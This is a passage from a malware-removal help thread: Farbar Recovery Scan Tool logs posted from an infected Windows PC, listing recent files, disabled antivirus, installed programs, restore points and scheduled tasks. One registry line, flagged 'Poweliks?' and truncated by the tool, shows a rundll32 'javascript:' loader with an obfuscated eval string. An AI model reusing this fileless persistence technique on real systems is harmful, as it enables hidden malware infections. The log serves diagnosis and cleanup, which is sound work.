16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 
18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 
13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () 
C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 17:13 - 2011-08-28 
07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-25 09:24

==================== End Of Log ============================

jjoyner1985 Posted August 25, 2014 Author ID:871052

Addition

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-25 09:48:44
Running from G:\
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version: - Microsoft)32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) HiddenAcrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) HiddenActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) HiddenAdobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)Akamai NetSession Interface (HKCU\...\Akamai) (Version: - Akamai Technologies, Inc)Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version: - Any-Video-Converter.com)Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)AVG 2011 (Version: 10.0.1388 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1390 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1391 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1392 - AVG Technologies) HiddenAVG 
2011 (Version: 10.0.1410 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1416 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.2109 - AVG Technologies) HiddenBonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)bpd_scan (Version: 3.00.0000 - Hewlett-Packard) HiddenBPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) HiddenBPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) HiddenBrowser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)BufferChm (Version: 120.0.194.000 - Hewlett-Packard) HiddenCatalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Portuguese 
(Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) HiddenCCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help English (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help French (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help German (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Italian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Korean (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Polish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Thai (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hiddenccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hiddenccc-utility (Version: 2007.0731.2234.38497 - ATI) HiddenCCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)Destination Component (Version: 110.0.0.0 - Hewlett-Packard) 
HiddenDeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) HiddenDocMgr (Version: 120.0.000.000 - Hewlett-Packard) HiddenDocProc (Version: 12.0.0.0 - Hewlett-Packard) HiddenEDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version: - )Fax (Version: 120.0.194.000 - Hewlett-Packard) HiddenFeedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) HiddenHP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) HiddenHPSSupply (Version: 120.0.194.000 - Hewlett-Packard) HiddenHTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) HiddenMediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - 
Dell)Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) HiddenMicrosoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) HiddenMicrosoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version: - Microsoft)Microsoft Office 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) HiddenMicrosoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Security Client (Version: 2.1.1116.0 - Microsoft 
Corporation) HiddenMicrosoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)Network (Version: 120.0.194.000 - Hewlett-Packard) HiddenOCR Software by I.R.I.S. 
12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)ProductContext (Version: 50.0.165.000 - Hewlett-Packard) HiddenQuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - )Roxio Creator Audio (Version: 3.7.0 - Roxio) HiddenRoxio Creator Copy (Version: 3.7.0 - Roxio) HiddenRoxio Creator Data (Version: 3.7.0 - Roxio) HiddenRoxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)Roxio Creator DE (Version: 3.7.0 - Roxio) HiddenRoxio Creator Tools (Version: 3.7.0 - Roxio) HiddenRoxio Express Labeler 3 (Version: 3.2.1 - Roxio) HiddenRoxio Update Manager (Version: 6.0.0 - Roxio) HiddenSAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) HiddenScan (Version: 12.0.0.0 - Hewlett-Packard) HiddenShop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)Skins (Version: 2007.0731.2234.38497 - ATI) HiddenSmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) HiddenSolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) HiddenSpelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)Status (Version: 120.0.194.000 - Hewlett-Packard) HiddenToolbox (Version: 120.0.194.000 - Hewlett-Packard) HiddenTransporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)TrayApp (Version: 
120.0.194.000 - Hewlett-Packard) HiddenUnloadSupport (Version: 11.0.0 - Hewlett-Packard) HiddenUpdate for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version: - Microsoft)Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version: - Microsoft)Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version: - Microsoft)Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version: - Microsoft)Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version: - Microsoft)Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) 
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

29-07-2014 11:25:23 Scheduled Checkpoint
30-07-2014 11:45:57 Scheduled Checkpoint
01-08-2014 21:10:36 Scheduled Checkpoint
02-08-2014 16:42:56 Scheduled Checkpoint
04-08-2014 04:00:03 Scheduled Checkpoint
07-08-2014 22:48:19 Scheduled Checkpoint
11-08-2014 02:11:41 Scheduled Checkpoint
11-08-2014 15:01:42 Scheduled Checkpoint
12-08-2014 10:45:08 Scheduled Checkpoint
14-08-2014 02:36:25 Scheduled Checkpoint
14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14 17:59
14-08-2014 23:31:34 Advanced-System Protector
15-08-2014 23:47:04 Removed SofTest
16-08-2014 13:18:06 Removed DriverUpdate
16-08-2014 13:29:10 Removed HTC Sync.
16-08-2014 13:44:46 Removed HTC Sync.
16-08-2014 14:02:17 Removed HTC BMP USB Driver.
16-08-2014 16:47:50 Advanced-System Protector
16-08-2014 21:58:06 Installed AVG 2014
16-08-2014 22:11:41 Removed SlimCleaner Plus
16-08-2014 22:14:50 Removed HTC Driver Installer.
17-08-2014 19:56:09 Installed AVG 2014
17-08-2014 19:59:04 Installed AVG 2014
17-08-2014 20:03:04 Removed AVG 2014
17-08-2014 20:04:51 Installed AVG 2011
17-08-2014 21:08:16 Installed AVG 2014
17-08-2014 21:16:20 Installed AVG 2014
17-08-2014 21:24:43 Removed AVG 2014
17-08-2014 21:26:10 Installed AVG 2011
19-08-2014 21:04:48 Advanced-System Protector
21-08-2014 01:40:12 Advanced-System Protector
23-08-2014 20:47:11 Checkpoint by HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)
